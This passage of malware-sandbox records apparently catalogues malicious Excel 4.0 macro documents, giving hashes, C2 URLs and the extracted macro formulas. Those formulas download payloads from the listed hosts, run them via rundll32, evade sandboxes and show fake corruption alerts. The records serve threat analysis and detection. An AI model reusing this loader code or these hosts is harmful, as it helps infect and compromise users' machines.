,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lPBKeOI7t2\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a16ced12d665aeb0735d55c630df3989e9a0243ba4e4b7cfe29d9083b818869b"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a16ced12d665aeb0735d55c630df3989e9a0243ba4e4b7cfe29d9083b818869b","filesize":160768,"md5":"70295fd4a2b3bea317fb78d881fee701","sha1":"3ae40a31a555113fe395c39bbd5cee20a3c6732c","sha256":"a16ced12d665aeb0735d55c630df3989e9a0243ba4e4b7cfe29d9083b818869b","sha512":"7f32f2584df306e1a9e8746036f0899e6c9d1ce675f5a16673b885c0adbef07886bee067d51c53f3054221a70ad5f2a9fd5f5570f8c9f7aea2d46ebbb1e410e6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a16ced12d665aeb0735d55c630df3989e9a0243ba4e4b7cfe29d9083b818869b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vQ00UyhCve\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a17899ef56ddf7d650daeca2517b4a948253671ddbb0c50780344444bf61a795"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a17899ef56ddf7d650daeca2517b4a948253671ddbb0c50780344444bf61a795","filesize":141824,"md5":"e0df5c1ddb2baef48b342054197065de","sha1":"e9d45a98232b2516c2e27c5cce42db8af22ac9a2","sha256":"a17899ef56ddf7d650daeca2517b4a948253671ddbb0c50780344444bf61a795","sha512":"bc9ff6d6e0d98150f3e78d608a09e0d0f211c2d5fed269fd49e118f7cb2fb930b94c3b39073e154af4347640b4758b43501f6be9206a6860e31486ea9d9634af","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a17899ef56ddf7d650daeca2517b4a948253671ddbb0c50780344444bf61a795.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://orruucsl.xyz/fdgareg34g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"EWEmqspf2v\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a1902b6d49d9d3ac386785f46d50685347e47ae91c7dceb5d0a185f59849aa18"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a1902b6d49d9d3ac386785f46d50685347e47ae91c7dceb5d0a185f59849aa18","filesize":144384,"md5":"5a553de3adf0cd7068ebf0cf1b633822","sha1":"c7f9af7414faa4ebb909df607c46ac2997ca35d5","sha256":"a1902b6d49d9d3ac386785f46d50685347e47ae91c7dceb5d0a185f59849aa18","sha512":"025f387564ade565bf3ffc35af1aea62cf6a8ec1129b9042040b6feddf9c67e5d0277ca10338819e43e0fc51eda1f94545c0959da34a76f2fe82a48b5a6c3a55","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a1902b6d49d9d3ac386785f46d50685347e47ae91c7dceb5d0a185f59849aa18.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"BsBBzcb1f3\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a1a1acedfdc4aaef5e45175113d8164b1464da75680aae6a7ca0c28e1dcf8e78"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a1a1acedfdc4aaef5e45175113d8164b1464da75680aae6a7ca0c28e1dcf8e78","filesize":152576,"md5":"1b227d78bf665c97dd3125d1f7036ed7","sha1":"42306571e85a166a2c3e6a58d48ed8e8e7203735","sha256":"a1a1acedfdc4aaef5e45175113d8164b1464da75680aae6a7ca0c28e1dcf8e78","sha512":"93784269d59c6d7ad9cd2db3cef4ef7a625edcdd649584e15a98f4255bdd049c26f7b8b8519693554bfed3b9a65bf0ba79f4e6db598f485d36b36d547a3877c2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a1a1acedfdc4aaef5e45175113d8164b1464da75680aae6a7ca0c28e1dcf8e78.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5c48Ar0wZZ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a1acd653f517fba33a4d4c011eb0228b8d99c2a692ecd806dbb857625244ff45"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a1acd653f517fba33a4d4c011eb0228b8d99c2a692ecd806dbb857625244ff45","filesize":113664,"md5":"bb59e41fcb85767110caccb43ef48401","sha1":"3b0e65fe5c97a34cfd7bf2c05fd9fc3e8b0652f5","sha256":"a1acd653f517fba33a4d4c011eb0228b8d99c2a692ecd806dbb857625244ff45","sha512":"3ab0f6fe5a80550414a3b0617dd374a0fc36f6bdcaaea355609124b683954f68f62ed087957f64541d4dd1af67657c63887480edf3fc8d30c7c3e6d3409d81b1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a1acd653f517fba33a4d4c011eb0228b8d99c2a692ecd806dbb857625244ff45.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"OkRALIJiSM\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a1af986c4420c56f3ee342ef1ae1367f7d1d309babce5094fdc0c893018fb3ef"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a1af986c4420c56f3ee342ef1ae1367f7d1d309babce5094fdc0c893018fb3ef","filesize":168448,"md5":"71a7fe3de4069b812cca3a751569f74e","sha1":"8525b6b88c90e49098a50d96c8136c4b1fad7230","sha256":"a1af986c4420c56f3ee342ef1ae1367f7d1d309babce5094fdc0c893018fb3ef","sha512":"54c7c0d5701d9338be27e11ca03fb901553d32acf54244bbe1ae3534acd7075b2c0f983eed4ab2a7020ed2c76e2268035bced0947f058044e2fb4ad13b3aeb98","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a1af986c4420c56f3ee342ef1ae1367f7d1d309babce5094fdc0c893018fb3ef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QTjk0RZkkS\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a1ce0edd87bea9428517b3a24d8a740007c384a55aa140b1809660ff60afffb7"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a1ce0edd87bea9428517b3a24d8a740007c384a55aa140b1809660ff60afffb7","filesize":167936,"md5":"79c8fbcd19413f7a5a5e755c7edda811","sha1":"1bb95ded25cbb9a38ebdb5c9280d22a237e7d0a4","sha256":"a1ce0edd87bea9428517b3a24d8a740007c384a55aa140b1809660ff60afffb7","sha512":"9d9c75677bd470164d1ce7cec8e78c0061c84cf2c10807a1824e0d43bba0f22a1d5e716ebc887ce2876bc02361241d7588c2bec69bee1a1e3ce8211ba3da0e5c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a1ce0edd87bea9428517b3a24d8a740007c384a55aa140b1809660ff60afffb7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"k6ruXxmB7N\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a1d3b2fe87343c70e6f2a86a0955f0558f743c9f7cbfa1f76987d621b0ed9efb"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a1d3b2fe87343c70e6f2a86a0955f0558f743c9f7cbfa1f76987d621b0ed9efb","filesize":160768,"md5":"dd59f9b14daff692d04d6ca599794110","sha1":"a24e471c3b2ed482db814dc8ac8db4271e3a365d","sha256":"a1d3b2fe87343c70e6f2a86a0955f0558f743c9f7cbfa1f76987d621b0ed9efb","sha512":"6cc58c5dba1f7ad661e6d83cbce2b6849ef6658a262a66e41d256e26dd8746ec3a80aa0269600a99fb6641373c01659f535b6fff34ecbaa3a1cea4d0563aa12f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a1d3b2fe87343c70e6f2a86a0955f0558f743c9f7cbfa1f76987d621b0ed9efb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Bh1ktu8ohF\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a1ea4feabf530921835231218553c300073add6434ffa2e8f66b4b94bdd5b98e"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a1ea4feabf530921835231218553c300073add6434ffa2e8f66b4b94bdd5b98e","filesize":112128,"md5":"8714adbdcd842dc0dc8b2bf159959370","sha1":"344199ea3f6655353fc97e1265ae438959bca83e","sha256":"a1ea4feabf530921835231218553c300073add6434ffa2e8f66b4b94bdd5b98e","sha512":"64b790968a349f8c8f1d88de820e994aad9ba84ea02a3b99f0cd2ded519530100d03915145d21ba27634b4f43dd3b0c5c66d00165652564a675e7c491019e5a0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a1ea4feabf530921835231218553c300073add6434ffa2e8f66b4b94bdd5b98e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a2019b792456276bd917648927550ace100e08fa899856362aed244e50d0488a"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a2019b792456276bd917648927550ace100e08fa899856362aed244e50d0488a","filesize":104448,"md5":"58dbdfb9c0f96497589e9550788bdda7","sha1":"613f88fa40ca2855aa0df17c4d7abb39383613b9","sha256":"a2019b792456276bd917648927550ace100e08fa899856362aed244e50d0488a","sha512":"f94f6b915f3b690c50c4c384c69fd90f6785d478063470151a1c8b56cdb5890a3e7a51dce838624a6ae9ccca8b20f47525791707e9dc70f5497655e7df404170","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a2019b792456276bd917648927550ace100e08fa899856362aed244e50d0488a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"khtCUIuvxR\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a21aec1895cf1faf5ea94dc9d83696f74bfa44d0a06cf3d3e730b2da33008456"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a21aec1895cf1faf5ea94dc9d83696f74bfa44d0a06cf3d3e730b2da33008456","filesize":160768,"md5":"3c12dd30dccfafed12da7c5c5a01d1dc","sha1":"c8f51c2c0563736866b73603258031f2a155d4ce","sha256":"a21aec1895cf1faf5ea94dc9d83696f74bfa44d0a06cf3d3e730b2da33008456","sha512":"19bc41c0406c5ff7ea0c26b42666e2087a8378b34a38e5a2134a8454ac156e66de04fc4eebb2a16f2bc9bd9e75596898695662fcd0cdd65bca78e24a1e137c78","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a21aec1895cf1faf5ea94dc9d83696f74bfa44d0a06cf3d3e730b2da33008456.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sL7KrgYQ5z\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a223d5f8839cb2418f56144dcb7f48b29b23563b73d537926f1c99d14e11f1c6"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a223d5f8839cb2418f56144dcb7f48b29b23563b73d537926f1c99d14e11f1c6","filesize":167936,"md5":"5135013240e3dfbf9376c2fcad6ba61b","sha1":"e8b021eaf707607ae878fee7904ba79e868b0e71","sha256":"a223d5f8839cb2418f56144dcb7f48b29b23563b73d537926f1c99d14e11f1c6","sha512":"7767722e8c01b8322d848d46f9ee29610c12091cf2ea1c60554fe7db40fdfef9ff8f6de28f2647b445c9d5b1f539bb979fc560e96bf1bc6267ca9994c2a0500d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a223d5f8839cb2418f56144dcb7f48b29b23563b73d537926f1c99d14e11f1c6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HOzCDK9nVA\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a241fb0a99e84f615b0056cc353eed060f39d7a4b941e54600c03eb51bc6af58"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a241fb0a99e84f615b0056cc353eed060f39d7a4b941e54600c03eb51bc6af58","filesize":168960,"md5":"be2150893484e78beb18d50c913c150c","sha1":"685c9dad86c197b940e2cd5c4a90d4f847799847","sha256":"a241fb0a99e84f615b0056cc353eed060f39d7a4b941e54600c03eb51bc6af58","sha512":"56531e92ba78e55c4e76a599369153060d8f5790aaada6eab93d80f6ff35e7a6cb9a96ee7c3c7f09512fe5e797cb3bc925b081c28687636a06c0990bfe0acbb5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a241fb0a99e84f615b0056cc353eed060f39d7a4b941e54600c03eb51bc6af58.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"V99acYw0Gk\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a265c20026f629d72094e0cad7b7392d613c0d766da2c5e049748a3a8cd69416"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a265c20026f629d72094e0cad7b7392d613c0d766da2c5e049748a3a8cd69416","filesize":225280,"md5":"3b8aa370a521f6cbcafb6e2e16420d69","sha1":"797926e27849fabf998b4d7ec1dad4c790f839c3","sha256":"a265c20026f629d72094e0cad7b7392d613c0d766da2c5e049748a3a8cd69416","sha512":"bd3b77be45724c910e8cf17f1890ebf1106c95ebce19ae459ec76e804c6680c4c5b6a4ac9ec45d51518cb417660355bbbdc58cb64c5c0e7ff973afb61fe5b6cb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a265c20026f629d72094e0cad7b7392d613c0d766da2c5e049748a3a8cd69416.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6y3iy5XmTF\",TRUE)\nGOTO(R$0C$18)"}}}]}
